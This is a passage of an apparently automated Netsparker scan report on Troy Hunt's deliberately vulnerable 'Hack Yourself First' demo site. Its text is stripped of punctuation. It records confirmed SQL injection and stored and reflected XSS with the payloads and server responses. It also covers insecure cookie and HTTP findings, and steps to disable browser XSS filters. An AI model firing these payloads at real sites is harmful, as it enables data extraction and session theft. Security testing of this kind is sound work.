RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
